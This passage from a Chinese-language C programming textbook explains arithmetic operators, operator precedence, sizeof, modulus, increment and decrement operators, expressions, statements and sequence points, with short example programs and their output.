计算机会查看加法运算符右侧的两个变量,把它们相加,然后把和赋给 变量income。 在此提醒读者注意,income、salary和bribes都是可修改的左值。因为每 个变量都标识了一个可被赋值的数据对象。但是,表达式salary + brives是一 个右值。 5.2.3 减法运算符:- 249 减法运算符(subtraction operator)用于减法运算,使其左侧的数减去右 侧的数。例如,下面的语句把200.0赋给takehome: takehome = 224.00 – 24.00; +和-运算符都被称为二元运算符(binary operator),即这些运算符需要 两个运算对象才能完成操作。 5.2.4 符号运算符:-和+ 减号还可用于标明或改变一个值的代数符号。例如,执行下面的语句 后,smokey的值为12: rocky = –12; smokey = –rocky;以这种方式使用的负号被称为一元运算符(unary operator)。一元运算符只需要一个运算对象(见图5.2)。 C90标准新增了一元+运算符,它不会改变运算对象的值或符号,只能 这样使用: dozen = +12; 编译器不会报错。但是在以前,这样做是不允许的。 250 图5.2 一元和二元运算符 5.2.5 乘法运算符:* 符号*表示乘法。下面的语句用2.54乘以inch,并将结果赋给cm: cm = 2.54 * inch; C没有平方函数,如果要打印一个平方表,怎么办?如程序清单5.4所 示,可以使用乘法来计算平方。 程序清单5.4 squares.c程序 251 /* squares.c -- 计算1~20的平方 */ #include <stdio.h> int main(void) { int num = 1; while (num < 21) { printf("%4d %6d\n", num, num * num); num = num + 1; } return 0; } 该程序打印数字1~20及其平方。接下来,我们再看一个更有趣的例 子。 1.指数增长 读者可能听过这样一个故事,一位强大的统治者想奖励做出突出贡献的 学者。他问这位学者想要什么,学者指着棋盘说,在第1个方格里放1粒小 麦、第2个方格里放2粒小麦、第3个方格里放4粒小麦,第4个方格里放 8 粒 小麦,以此类推。这位统治者不熟悉数学,很惊讶学者竟然提出如此谦虚的 要求。因为他原本准备奖励给学者一大笔财产。如果程序清单5.5运行的结 果正确,这显然是跟统治者开了一个玩笑。程序计算出每个方格应放多少小 麦,并计算了总数。可能大多数人对小麦的产量不熟悉,该程序以谷粒数为 252 单位,把计算的小麦总数与粗略估计的世界小麦年产量进行了比较。 程序清单5.5 wheat.c程序 /* wheat.c -- 指数增长 */ #include <stdio.h> #define SQUARES 64       // 棋盘中的方格数 int main(void) { const double CROP = 2E16; // 世界小麦年产谷粒数 double current, total; int count = 1; printf("square    grains     total    "); printf("fraction of \n"); printf("       added     grains   "); printf("world total\n"); total = current = 1.0;   /* 从1颗谷粒开始 */ printf("%4d %13.2e %12.2e %12.2e\n", count, current, total, total / CROP); while (count < SQUARES) { 253 count = count + 1; current = 2.0 * current;  /* 下一个方格谷粒翻倍 */ total = total + current;  /* 更新总数 */ printf("%4d %13.2e %12.2e %12.2e\n", count, current, total, total / CROP); } printf("That's all.\n"); return 0; } 程序的输出结果如下: square      grains      total       fraction of added       grains      world total 1        1.00e+00    1.00e+00    5.00e-17 2        2.00e+00    3.00e+00    1.50e-16 3        4.00e+00    7.00e+00    3.50e-16 4        8.00e+00    1.50e+01    7.50e-16 5        1.60e+01    3.10e+01    1.55e-15 6        3.20e+01    6.30e+01    3.15e-15 7        6.40e+01    1.27e+02    6.35e-15 254 8        1.28e+02    2.55e+02    1.27e-14 9        2.56e+02    5.11e+02    2.55e-14 10       5.12e+02    1.02e+03    5.12e-14 10个方格以后,该学者得到的小麦仅超过了1000粒。但是,看看55个方 格的小麦数是多少: 55      1.80e+16    3.60e+16    1.80e+00 总量已超过了世界年产量!不妨自己动手运行该程序,看看第64个方格 有多少小麦。 这个程序示例演示了指数增长的现象。世界人口增长和我们使用的能源 都遵循相同的模式。 5.2.6 除法运算符:/ C使用符号/来表示除法。/左侧的值是被除数,右侧的值是除数。例 如,下面four的值是4.0: four = 12.0/3.0; 整数除法和浮点数除法不同。浮点数除法的结果是浮点数,而整数除法 的结果是整数。整数是没有小数部分的数。这使得5除以3很让人头痛,因为 实际结果有小数部分。在C语言中,整数除法结果的小数部分被丢弃,这一 过程被称为截断(truncation)。 运行程序清单5.6中的程序,看看截断的情况,体会整数除法和浮点数 除法的区别。 程序清单5.6 divide.c程序 /* divide.c -- 演示除法 */ 255 #include <stdio.h> int main(void) { printf("integer division:  5/4  is %d \n", 5 / 4); printf("integer division:  6/3  is %d \n", 6 / 3); printf("integer division:  7/4  is %d \n", 7 / 4); printf("floating division: 7./4. is %1.2f \n", 7. / 4.); printf("mixed division:   7./4  is %1.2f \n", 7. / 4); return 0; } 程序清单5.6中包含一个“混合类型”的示例,即浮点值除以整型值。C相 对其他一些语言而言,在类型管理上比较宽容。尽管如此,一般情况下还是 要避免使用混合类型。该程序的输出如下: integer division:  5/4   is 1 integer division:  6/3   is 2 integer division:  7/4   is 1 floating division: 7./4. 
is 1.75 mixed division:   7./4  is 1.75 注意,整数除法会截断计算结果的小数部分(丢弃整个小数部分),不 会四舍五入结果。混合整数和浮点数计算的结果是浮点数。实际上,计算机 256 不能真正用浮点数除以整数,编译器会把两个运算对象转换成相同的类型。 本例中,在进行除法运算前,整数会被转换成浮点数。 C99标准以前,C语言给语言的实现者留有一些空间,让他们来决定如 何进行负数的整数除法。一种方法是,舍入过程采用小于或等于浮点数的最 大整数。当然,对于3.8而言,处理后的3符合这一描述。但是-3.8 会怎样? 该方法建议四舍五入为-4,因为-4 小于-3.8.但是,另一种舍入方法是直接丢 弃小数部分。这种方法被称为“趋零截断”,即把-3.8转换成-3。在C99以前, 不同的实现采用不同的方法。但是C99规定使用趋零截断。所以,应把-3.8 转换成-3。 5.2.7 运算符优先级 考虑下面的代码: butter = 25.0 + 60.0 * n / SCALE; 这条语句中有加法、乘法和除法运算。先算哪一个?是25.0加上60.0, 然后把计算的和85.0乘以n,再把结果除以SCALE?还是60.0乘以n,然后把 计算的结果加上25.0,最后再把结果除以SCALE?还是其他运算顺序?假设 n是6.0,SCALE是2.0,带入语句中计算会发现,第1种顺序得到的结果是 255,第2种顺序得到的结果是192.5。C程序一定是采用了其他的运算顺序, 因为程序运行该语句后,butter的值是205.0。 显然,执行各种操作的顺序很重要。C 语言对此有明确的规定,通过运 算符优先级来解决操作顺序的问题。每个运算符都有自己的优先级。正如普 通的算术运算那样,乘法和除法的优先级比加法和减法高,所以先执行乘法 和除法。如果两个运算符的优先级相同怎么办?如果它们处理同一个运算对 象,则根据它们在语句中出现的顺序来执行。对大多数运算符而言,这种情 况都是按从左到右的顺序进行(=运算符除外)。因此,语句: butter = 25.0 + 60.0 * n / SCALE; 257 的运算顺序是: 60.0 * n     首先计算表达式中的*或/(假设n的值是6,所以 60.0*n得360.0) 360.0 / SCALE   然后计算表达式中第2个*或/ 25.0 + 180     最后计算表达式里第1个+或-,结果为205.0(假设 SCALE的值是2.0) 许多人喜欢用表达式树(expression tree)来表示求值的顺序,如图5.3 所示。该图演示了如何从最初的表达式逐步简化为一个值。 图5.3 用表达式树演示运算符、运算对象和求值顺序 如何让加法运算在乘法运算之前执行?可以这样做: flour = (25.0 + 60.0 * n) / SCALE; 最先执行圆括号中的部分。圆括号内部按正常的规则执行。该例中,先 执行乘法运算,再执行加法运算。执行完圆括号内的表达式后,用运算结果 除以SCALE。 258 表5.1总结了到目前为止学过的运算符优先级。 表5.1 运算符优先级(从低至高) 注意正号(加号)和负号(减号)的两种不同用法。结合律栏列出了运 算符如何与运算对象结合。例如,一元负号与它右侧的量相结合,在除法中 用除号左侧的运算对象除以右侧的运算对象。 5.2.8 优先级和求值顺序 运算符优先级为表达式中的求值顺序提供重要的依据,但是并没有规定 所有的顺序。C 给语言的实现者留出选择的余地。考虑下面的语句: y = 6 * 12 + 5 * 20; 当运算符共享一个运算对象时,优先级决定了求值顺序。例如上面的语 句中,12是*和+运算符的运算对象。根据运算符的优先级,乘法的优先级比 加法高,所以先进行乘法运算。类似地,先对 5 进行乘法运算而不是加法运 算。简而言之,先进行两个乘法运算6 * 12和5 * 20,再进行加法运算。但 是,优先级并未规定到底先进行哪一个乘法。C 语言把主动权留给语言的实 现者,根据不同的硬件来决定先计算前者还是后者。可能在一种硬件上采用 某种方案效率更高,而在另一种硬件上采用另一种方案效率更高。无论采用 哪种方案,表达式都会简化为 72 + 100,所以这并不影响最终的结果。但 是,读者可能会根据乘法从左往右的结合律,认为应该先执行+运算符左边 的乘法。结合律只适用于共享同一运算对象运算符。例如,在表达式12 / 3 * 2中,/和*运算符的优先级相同,共享运算对象3。因此,从左往右的结合律 在这种情况起作用。表达式简化为4 * 2,即8(如果从右往左计算,会得到 259 12/6,即2,这种情况下计算的先后顺序会影响最终的计算结果)。在该例 中,两个*运算符并没有共享同一个运算对象,因此从左往右的结合律不适 用于这种情况。 学以致用 接下来,我们在更复杂的示例中使用以上规则,请看程序清单5.7。 程序清单5.7 rules.c程序 /* rules.c -- 优先级测试 */ #include <stdio.h> int main(void) { int top, score; top = score = -(2 + 5) * 6 + (4 + 3 * (2 + 3)); printf("top = %d, score = %d\n", top, score); return 0; } 该程序会打印什么值?先根据代码推测一下,再运行程序或阅读下面的 分析来检查你的答案。 首先,圆括号的优先级最高。先计算-(2 + 5) * 6中的圆括号部分,还是 先计算(4 + 3 * (2 + 3))中的圆括号部分取决于具体的实现。圆括号的最高优 先级意味着,在子表达式-(2 + 5) * 6中,先计算(2 + 5)的值,得7。然后,把 一元负号应用在7上,得-7。现在,表达式是: 260 top = score = -7 * 6 + (4 + 3 * (2 + 3)) 下一步,计算2 + 3的值。表达式变成: top = score = -7 * 6 + (4 + 3 * 5) 接下来,因为圆括号中的*比+优先级高,所以表达式变成: top = score = -7 * 6 + (4 + 15) 然后,表达式为: top = score = -7 * 6 + 19 -7乘以6后,得到下面的表达式: top = score = -42 + 19 然后进行加法运算,得到: top = score = -23 现在,-23被赋值给score,最终top的值也是-23。记住,=运算符的结合 律是从右往左。 261 5.3 其他运算符 C语言有大约40个运算符,有些运算符比其他运算符常用得多。前面讨 论的是最常用的,本节再介绍4个比较有用的运算符。 5.3.1 sizeof运算符和size_t类型 读者在第3章就见过sizeof运算符。回顾一下,sizeof运算符以字节为单 位返回运算对象的大小(在C中,1字节定义为char类型占用的空间大小。过 去,1字节通常是8位,但是一些字符集可能使用更大的字节)。运算对象可 以是具体的数据对象(如,变量名)或类型。如果运算对象是类型(如, float),则必须用圆括号将其括起来。程序清单5.8演示了这两种用法。 程序清单5.8 sizeof.c程序 // sizeof.c -- 使用sizeof运算符 // 使用C99新增的%zd转换说明 -- 如果编译器不支持%zd,请将其改 成%u或%lu #include <stdio.h> int main(void) { int n = 0; size_t intsize; intsize = sizeof (int); printf("n = %d, n has %zd bytes; all ints have %zd  bytes.\n", 262 n, sizeof n, intsize); return 0; } C 语言规定,sizeof 返回 size_t 类型的值。这是一个无符号整数类型, 但它不是新类型。前面介绍过,size_t是语言定义的标准类型。C有一个 typedef机制(第14章再详细介绍),允许程序员为现有类型创建别名。例 如, typedef double real; 这样,real就是double的别名。现在,可以声明一个real类型的变量: real deal; // 使用typedef 
编译器查看real时会发现,在typedef声明中real已成为double的别名,于 是把deal创建为double 类型的变量。类似地,C 头文件系统可以使用 typedef 把 size_t 作为 unsigned int 或unsigned long的别名。这样,在使用size_t类型 时,编译器会根据不同的系统替换标准类型。 C99 做了进一步调整,新增了%zd 转换说明用于 printf()显示 size_t 类型 的值。如果系统不支持%zd,可使用%u或%lu代替%zd。 5.3.2 求模运算符:% 求模运算符(modulus operator)用于整数运算。求模运算符给出其左侧 整数除以右侧整数的余数(remainder)。例如,13 % 5(读作“13求模5”) 得3,因为13比5的两倍多3,即13除以5的余数是3。求模运算符只能用于整 数,不能用于浮点数。 乍一看会认为求模运算符像是数学家使用的深奥符号,但是实际上它非 常有用。求模运算符常用于控制程序流。例如,假设你正在设计一个账单预 263 算程序,每 3 个月要加进一笔额外的费用。这种情况可以在程序中对月份求 模3(即,month % 3),并检查结果是否为0。如果为0,便加进额外的费 用。等学到第7章的if语句后,读者会更明白。 程序清单5.9演示了%运算符的另一种用途。同时,该程序也演示了 while循环的另一种用法。 程序清单5.9 min_sec.c程序 // min_sec.c -- 把秒数转换成分和秒 #include <stdio.h> #define SEC_PER_MIN 60      // 1分钟60秒 int main(void) { int sec, min, left; printf("Convert seconds to minutes and seconds!\n"); printf("Enter the number of seconds (<=0 to quit):\n"); scanf("%d", &sec);      // 读取秒数 while (sec > 0) { min = sec / SEC_PER_MIN;  // 截断分钟数 left = sec % SEC_PER_MIN;  // 剩下的秒数 printf("%d seconds is %d minutes, %d seconds.\n", sec, 264 min, left); printf("Enter next value (<=0 to quit):\n"); scanf("%d", &sec); } printf("Done!\n"); return 0; } 该程序的输出如下: 程序清单5.2使用一个计数器来控制while循环。当计数器超出给定的大 小时,循环终止。而程序清单5.9则通过scanf()为变量sec获取一个新值。只 要该值为正,循环就继续。当用户输入一个0或负值时,循环退出。这两种 情况设计的要点是,每次循环都会修改被测试的变量值。 负数求模如何进行?C99规定“趋零截断”之前,该问题的处理方法很 多。但自从有了这条规则之后,如果第1个运算对象是负数,那么求模的结 果为负数;如果第1个运算对象是正数,那么求模的结果也是正数: 265 11 / 5得2,11 % 5得1 11 / -5得-2,11 % -2得1 -11 / -5得2,-11 % -5得-1 -11 / 5得-2,-11 % 5得-1 如果当前系统不支持C99标准,会显示不同的结果。实际上,标准规 定:无论何种情况,只要a和b都是整数值,便可通过a - (a/b)*b来计算a%b。 例如,可以这样计算-11%5: -11 - (-11/5) * 5 = -11 -(-2)*5 = -11 -(-10) = -1 5.3.3 递增运算符:++ 递增运算符(increment operator)执行简单的任务,将其运算对象递增 1。该运算符以两种方式出现。第1种方式,++出现在其作用的变量前面, 这是前缀模式;第2种方式,++出现在其作用的变量后面,这是后缀模式。 两种模式的区别在于递增行为发生的时间不同。我们先解释它们的相似之 处,再分析它们不同之处。程序清单5.10中的程序示例演示了递增运算符是 如何工作的。 程序清单5.10 add_one.c程序 /* add_one.c -- 递增:前缀和后缀 */ #include <stdio.h> int main(void) { int ultra = 0, super = 0; while (super < 5) 266 { super++; ++ultra; printf("super = %d, ultra = %d \n", super, ultra); } return 0; } 运行该程序后,其输出如下: super = 1, ultra = 1 super = 2, ultra = 2 super = 3, ultra = 3 super = 4, ultra = 4 super = 5, ultra = 5 该程序两次同时计数到5。用下面两条语句分别代替程序中的两条递增 语句,程序的输出相同: super = super + 1; ultra = ultra + 1; 这些都是很简单的语句,为何还要创建两个缩写形式?原因之一是,紧 凑结构的代码让程序更为简洁,可读性更高。这些运算符让程序看起来很美 观。例如,可重写程序清单5.2(shoes2.c)中的一部分代码: 267 shoe = 3.0; while (shoe < 18.5) { foot = SCALE * size + ADJUST; printf("%10.1f %20.2f inches\n", shoe, foot); ++shoe; } 但是,这样做也没有充分利用递增运算符的优势。还可以这样缩短这段 程序: shoe = 2.0; while (++shoe < 18.5) { foot = SCALE*shoe + ADJUST; printf("%10.1f %20.2f inches\n", shoe, foot); } 如上代码所示,把变量的递增过程放入while循环的条件中。这种结构 在C语言中很普遍,我们来仔细分析一下。 首先,这样的while循环是如何工作的?很简单。shoe的值递增1,然后 和18.5作比较。如果递增后的值小于18.5,则执行花括号内的语句一次。然 后,shoe的值再递增1,重复刚才的步骤,直到shoe的值不小于18.5为止。注 意,我们把shoe的初始值从3.0改为2.0,因为在对foot第1次求值之前, shoe 268 已经递增了1(见图5.4)。 图5.4 执行一次循环 其次,这样做有什么好处?它使得程序更加简洁。更重要的是,它把控 制循环的两个过程集中在一个地方。该循环的主要过程是判断是否继续循环 (本例中,要检查鞋子的尺码是否小于 18.5),次要过程是改变待测试的元 素(本例中是递增鞋子的尺码)。 如果忘记改变鞋子的尺码,shoe的值会一直小于18.5,循环不会停止。 计算机将陷入无限循环(infinite loop)中,生成无数相同的行。最后,只能 强行关闭这个程序。把循环测试和更新循环放在一处,就不会忘记更新循 环。 但是,把两个操作合并在一个表达式中,降低了代码的可读性,让代码 难以理解。而且,还容易产生计数错误。 递增运算符的另一个优点是,通常它生成的机器语言代码效率更高,因 为它和实际的机器语言指令很相似。尽管如此,随着商家推出的C编译器越 来越智能,这一优势可能会消失。一个智能的编译器可以把x = x + 1当作 ++x对待。 最后,递增运算符还有一个在某些场合特别有用的特性。我们通过程序 269 清单5.11来说明。 程序清单5.11 post_pre.c程序 /* post_pre.c -- 前缀和后缀 */ #include <stdio.h> int main(void) { int a = 1, b = 1; int a_post, pre_b; a_post = a++; // 后缀递增 pre_b = ++b;  // 前缀递增 printf("a  a_post  b  pre_b \n"); printf("%1d %5d %5d %5d\n", a, a_post, b, pre_b); 
return 0; } 如果你的编译器没问题,那么程序的输出应该是: a   a_post  b   pre_b 2       1  2      2 a和b都递增了1,但是,a_post是a递增之前的值,而b_pre是b递增之后 的值。这就是++的前缀形式和后缀形式的区别(见图5.5)。 270 图5.5 前缀和后缀 a_post = a++;   // 后缀:使用a的值乊后,递增a b_pre= ++b;    // 前缀:使用b的值乊前,递增b 单独使用递增运算符时(如,ego++;),使用哪种形式都没关系。但 是,当运算符和运算对象是更复杂表达式的一部分时(如上面的示例),使 用前缀或后缀的效果不同。例如,我们曾经建议用下面的代码: while (++shoe < 18.5) 该测试条件相当于提供了一个鞋子尺码到18的表。如果使用shoe++而不 是++shoes,尺码表会增至19。因为shoe会在与18.5进行比较之后才递增,而 不是先递增再比较。 当然,使用下面这种形式也没错: shoe = shoe + 1; 只不过,有人会怀疑你是否是真正的C程序员。 271 在学习本书的过程中,应多留意使用递增运算符的例子。自己思考是否 能互换使用前缀和后缀形式,或者当前环境是否只能使用某种形式。 如果使用前缀形式和后缀形式会对代码产生不同的影响,那么最为明智 的是不要那样使用它们。例如,不要使用下面的语句: b = ++i; // 如果使用i++,会得到不同的结果 应该使用下列语句: ++i;   // 第1行 b = i; // 如果第1行使用的是i++,幵不会影响b的值 尽管如此,有时小心翼翼地使用会更有意思。所以,本书会根据实际情 况,采用不同的写法。 5.3.4 递减运算符:-- 每种形式的递增运算符都有一个递减运算符(decrement operator)与之 对应,用--代替++即可: --count; // 前缀形式的递减运算符 count--; // 后缀形式的递减运算符 程序清单5.12演示了计算机可以是位出色的填词家。 程序清单5.12 bottles.c程序 #include <stdio.h> #define MAX 100 int main(void) 272 { int count = MAX + 1; while (--count > 0) { printf("%d bottles of spring water on the wall, " "%d bottles of spring water!\n", count, count); printf("Take one down and pass it around,\n"); printf("%d bottles of spring water!\n\n", count - 1); } return 0; } 该程序的输出如下(篇幅有限,省略了中间大部分输出): 100 bottles of spring water on the wall, 100 bottles of  spring water! Take one down and pass it around, 99 bottles of spring water! 99 bottles of spring water on the wall, 99 bottles of  spring water! Take one down and pass it around, 98 bottles of spring water! ... 273 1 bottles of spring water on the wall, 1 bottles of spring water! Take one down and pass it around, 0 bottles of spring water! 显然,这位填词家在复数的表达上有点问题。在学完第7章中的条件运 算符后,可以解决这个问题。 顺带一提,>运算符表示“大于”,<运算符表示“小于”,它们都是关系运 算符(relational operator)。我们将在第6章中详细介绍关系运算符。 5.3.5 优先级 递增运算符和递减运算符都有很高的结合优先级,只有圆括号的优先级 比它们高。因此,x*y++表示的是(x)*(y++),而不是(x+y)++。不过后者无 效,因为递增和递减运算符只能影响一个变量(或者,更普遍地说,只能影 响一个可修改的左值),而组合x*y本身不是可修改的左值。 不要混淆这两个运算符的优先级和它们的求值顺序。假设有如下语句: y = 2; n = 3; nextnum = (y + n++)*6; nextnum的值是多少?把y和n的值带入上面的第3条语句得: nextnum = (2 + 3)*6 = 5*6 = 30 n的值只有在被使用之后才会递增为4。根据优先级的规定,++只作用 于n,不作用与y + n。除此之外,根据优先级可以判断何时使用n的值对表达 式求值,而递增运算符的性质决定了何时递增n的值。 如果n++是表达式的一部分,可将其视为“先使用n,再递增”;而++n则 274 表示“先递增n,再使用”。 5.3.6 不要自作聪明 如果一次用太多递增运算符,自己都会糊涂。例如,利用递增运算符改 进 squares.c 程序(程序清单5.4),用下面的while循环替换原程序中的while 循环: while (num < 21) { printf("%10d %10d\n", num, num*num++); } 这个想法看上去不错。打印num,然后计算num*num得到平方值,最后 把num递增1。但事实上,修改后的程序只能在某些系统上能正常运行。该 程序的问题是:当 printf()获取待打印的值时,可能先对最后一个参数( ) 求值,这样在获取其他参数的值之前就递增了num。所以,本应打印: 5       25 却打印成: 6       25 它甚至可能从右往左执行,对最右边的num(++作用的num)使用5,对 第2个num和最左边的num使用6,结果打印出: 6       30 在C语言中,编译器可以自行选择先对函数中的哪个参数求值。这样做 提高了编译器的效率,但是如果在函数的参数中使用了递增运算符,就会有 一些问题。 275 类似这样的语句,也会导致一些麻烦: ans = num/2 + 5*(1 + num++); 同样,该语句的问题是:编译器可能不会按预想的顺序来执行。你可能 认为,先计算第1项(num/2),接着计算第2项(5*(1 + num++))。但是, 编译器可能先计算第2项,递增num,然后在num/2中使用num递增后的新 值。因此,无法保证编译器到底先计算哪一项。 还有一种情况,也不确定: n = 3; y = n++ + n++; 可以肯定的是,执行完这两条语句后,n的值会比旧值大2。但是,y的 值不确定。在对y求值时,编译器可以使用n的旧值(3)两次,然后把n递增 1两次,这使得y的值为6,n的值为5。或者,编译器使用n的旧值(3)一 次,立即递增n,再对表达式中的第2个n使用递增后的新值,然后再递增n, 这使得 y 的值为 7,n 的值为 5。两种方案都可行。对于这种情况更精确地 说,结果是未定义的,这意味着 C标准并未定义结果应该是什么。 遵循以下规则,很容易避免类似的问题: 如果一个变量出现在一个函数的多个参数中,不要对该变量使用递增或 递减运算符; 如果一个变量多次出现在一个表达式中,不要对该变量使用递增或递减 运算符。 另一方面,对于何时执行递增,C 还是做了一些保证。我们在本章后面 的“副作用和序列点”中学到序列点时再来讨论这部分内容。 276 5.4 表达式和语句 在前几章中,我们已经多次使用了术语表达式(expression)和语句 (statement)。现在,我们来进一步学习它们。C的基本程序步骤由语句组 成,而大多数语句都由表达式构成。因此,我们先学习表达式。 5.4.1 表达式 表达式(expression)由运算符和运算对象组成(前面介绍过,运算对 象是运算符操作的对象)。最简单的表达式是一个单独的运算对象,以此为 基础可以建立复杂的表达式。下面是一些表达式: 4 -6 4+21 a*(b + c/d)/20 q = 5*2 x = ++q % 3 q > 3 
如你所见,运算对象可以是常量、变量或二者的组合。一些表达式由子 表达式(subexpression)组成(子表达式即较小的表达式)。例如,c/d是上 面例子中a*(b + c/d)/20的子表达式。 每个表达式都有一个值 C 表达式的一个最重要的特性是,每个表达式都有一个值。要获得这个 值,必须根据运算符优先级规定的顺序来执行操作。在上面我们列出的表达 式中,前几个都很清晰明了。但是,有赋值运算符(=)的表达式的值是什 277 么?这些表达式的值与赋值运算符左侧变量的值相同。因此,表达式q = 5*2 作为一个整体的值是10。那么,表达式q > 3的值是多少?这种关系表达式 的值不是0就是1,如果条件为真,表达式的值为1;如果条件为假,表达式 的值为0。表5.2列出了一些表达式及其值: 表5.2 一些表达式及其值 虽然最后一个表达式看上去很奇怪,但是在C中完全合法(但不建议使 用),因为它是两个子表达式的和,每个子表达式都有一个值。 5.4.2 语句 语句(statement)是C程序的基本构建块。一条语句相当于一条完整的 计算机指令。在C中,大部分语句都以分号结尾。因此, legs = 4 只是一个表达式(它可能是一个较大表达式的一部分),而下面的代码 则是一条语句: legs = 4; 最简单的语句是空语句: ;   //空语句 C把末尾加上一个分号的表达式都看作是一条语句(即,表达式语 句)。因此,像下面这样写也没问题: 8; 278 3 + 4; 但是,这些语句在程序中什么也不做,不算是真正有用的语句。更确切 地说,语句可以改变值或调用函数: x = 25; ++x; y = sqrt(x); 虽然一条语句(或者至少是一条有用的语句)相当于一条完整的指令, 但并不是所有的指令都是语句。考虑下面的语句: x = 6 + (y = 5); 该语句中的子表达式y = 5是一条完整的指令,但是它只是语句的一部 分。因为一条完整的指令不一定是一条语句,所以分号用于识别在这种情况 下的语句(即,简单语句)。 到目前为止,读者已经见过多种语句(不包括空语句)。程序清单5.13 演示了一些常见的语句。 程序清单5.13 addemup.c程序 /* addemup.c -- 几种常见的语句 */ #include <stdio.h> int main(void)         /* 计算前20个整数的和  */ { int count, sum;     /* 声明[1]       */ count = 0;         /* 表达式语句      */ 279 sum = 0;          /* 表达式语句      */ while (count++ < 20)    /* 迭代语句      */ sum = sum + count; printf("sum = %d\n", sum); /* 表达式语句[2]     */ return 0;       /* 跳转语句         */ } 下面我们讨论程序清单 5.13。到目前为止,相信读者已经很熟悉声明 了。尽管如此,我们还是要提醒读者:声明创建了名称和类型,并为其分配 内存位置。注意,声明不是表达式语句。也就是说,如果删除声明后面的分 号,剩下的部分不是一个表达式,也没有值: int port /* 不是表达式,没有值 */ 赋值表达式语句在程序中很常用:它为变量分配一个值。赋值表达式语 句的结构是,一个变量名,后面是一个赋值运算符,再跟着一个表达式,最 后以分号结尾。注意,在while循环中有一个赋值表达式语句。赋值表达式 语句是表达式语句的一个示例。 函数表达式语句会引起函数调用。在该例中,调用printf()函数打印结 果。while语句有3个不同的部分(见图5.6)。首先是关键字while;然后, 圆括号中是待测试的条件;最后如果测试条件为真,则执行while循环体中 的语句。该例的while循环中只有一条语句。可以是本例那样的一条语句, 不需要用花括号括起来,也可以像其他例子中那样包含多条语句。多条语句 需要用花括号括起来。这种语句是复合语句,稍后马上介绍。 280 图5.6 简单的while循环结构 while语句是一种迭代语句,有时也被称为结构化语句,因为它的结构 比简单的赋值表达式语句复杂。在后面的章节里,我们会遇到许多这样的语 句。 副作用和序列点 我们再讨论一个C语言的术语副作用(side effect)。副作用是对数据对 象或文件的修改。例如,语句: states = 50; 它的副作用是将变量的值设置为50。副作用?这似乎更像是主要目的! 
但是从C语言的角度看,主要目的是对表达式求值。给出表达式4 + 6,C会 对其求值得10;给出表达式states = 50,C会对其求值得50。对该表达式求值 的副作用是把变量states的值改为50。跟赋值运算符一样,递增和递减运算 符也有副作用,使用它们的主要目的就是使用其副作用。 类似地,调用 printf()函数时,它显示的信息其实是副作用(printf()的返 回值是待显示字符的个数)。 281 序列点(sequence point)是程序执行的点,在该点上,所有的副作用都 在进入下一步之前发生。在 C语言中,语句中的分号标记了一个序列点。意 思是,在一个语句中,赋值运算符、递增运算符和递减运算符对运算对象做 的改变必须在程序执行下一条语句之前完成。后面我们要讨论的一些运算符 也有序列点。另外,任何一个完整表达式的结束也是一个序列点。 什么是完整表达式?所谓完整表达式(full expression),就是指这个表 达式不是另一个更大表达式的子表达式。例如,表达式语句中的表达式和 while循环中的作为测试条件的表达式,都是完整表达式。 序列点有助于分析后缀递增何时发生。例如,考虑下面的代码: while (guests++ < 10) printf("%d \n", guests); 对于该例,C语言的初学者认为“先使用值,再递增它”的意思是,在 printf()语句中先使用guests,再递增它。但是,表达式guests++ < 10是一个完 整的表达式,因为它是while循环的测试条件,所以该表达式的结束就是一 个序列点。因此,C 保证了在程序转至执行 printf()之前发生副作用(即,递 增guests)。同时,使用后缀形式保证了guests在完成与10的比较后才进行递 增。 现在,考虑下面这条语句: y = (4 + x++) + (6 + x++); 表达式4 + x++不是一个完整的表达式,所以C无法保证x在子表达式4 + x++求值后立即递增x。这里,完整表达式是整个赋值表达式语句,分号标记 了序列点。所以,C 保证程序在执行下一条语句之前递增x两次。C并未指明 是在对子表达式求值以后递增x,还是对所有表达式求值后再递增x。因此, 要尽量避免编写类似的语句。 5.4.3 复合语句(块) 282 复合语句(compound statement)是用花括号括起来的一条或多条语句, 复合语句也称为块(block)。shoes2.c程序使用块让while语句包含多条语 句。比较下面两个程序段: /* 程序段 1 */ index = 0; while (index++ < 10) sam = 10 * index + 2; printf("sam = %d\n", sam); /* 程序段 2 */ index = 0; while (index++ < 10) { sam = 10 * index + 2; printf("sam = %d\n", sam); } 程序段1,while循环中只有一条赋值表达式语句。没有花括号,while语 句从while这行运行至下一个分号。循环结束后,printf()函数只会被调用一 次。 程序段2,花括号确保两条语句都是while循环的一部分,每执行一次循 环就调用一次printf()函数。根据while语句的结构,整个复合语句被视为一 条语句(见图5.7)。 283 图5.7 带复合语句的while循环 提示 风格提示 再看一下前面的两个while程序段,注意循环体中的缩进。缩进对编译 器不起作用,编译器通过花括号和while循环的结构来识别和解释指令。这 里,缩进是为了让读者一眼就可以看出程序是如何组织的。 程序段2中,块或复合语句放置花括号的位置是一种常见的风格。另一 种常用的风格是: while (index++ < 10) { sam = 10*index + 2; printf("sam = %d \n", sam); } 284 这种风格突出了块附属于while循环,而前一种风格则强调语句形成一 个块。对编译器而言,这两种风格完全相同。 总而言之,使用缩进可以为读者指明程序的结构。 总结 表达式和语句 表达式: 表达式由运算符和运算对象组成。最简单的表达式是不带运算符的一个 常量或变量(如,22 或beebop)。更复杂的例子是55 + 22和vap = 2 * (vip + (vup = 4))。 语句: 到目前为止,读者接触到的语句可分为简单语句和复合语句。简单语句 以一个分号结尾。如下所示: 赋值表达式语句:   toes = 12; 函数表达式语句:   printf("%d\n", toes); 空语句:      ;  /* 什么也不做 */ 复合语句(或块)由花括号括起来的一条或多条语句组成。如下面的 while语句所示: while (years < 100) { wisdom = wisdom * 1.05; printf("%d %d\n", years, wisdom); years = years + 1; 285 } 286 5.5 类型转换 通常,在语句和表达式中应使用类型相同的变量和常量。但是,如果使 用混合类型,C 不会像 Pascal那样停在那里死掉,而是采用一套规则进行自 动类型转换。虽然这很便利,但是有一定的危险性,尤其是在无意间混合使 用类型的情况下(许多UNIX系统都使用lint程序检查类型“冲突”。如果选择 更高错误级别,许多非UNIX C编译器也可能报告类型问题)。最好先了解 一些基本的类型转换规则。 1.当类型转换出现在表达式时,无论是unsigned还是signed的char和short 都会被自动转换成int,如有必要会被转换成unsigned int(如果short与int的大 小相同,unsigned short就比int大。这种情况下,unsigned short会被转换成 unsigned int)。在K&R那时的C中,float会被自动转换成double(目前的C不 是这样)。由于都是从较小类型转换为较大类型,所以这些转换被称为升级 (promotion)。 2.涉及两种类型的运算,两个值会被分别转换成两种类型的更高级别。 3.类型的级别从高至低依次是long double、double、float、unsignedlong long、long long、unsigned long、long、unsigned int、int。例外的情况是,当 long 和 int 的大小相同时,unsigned 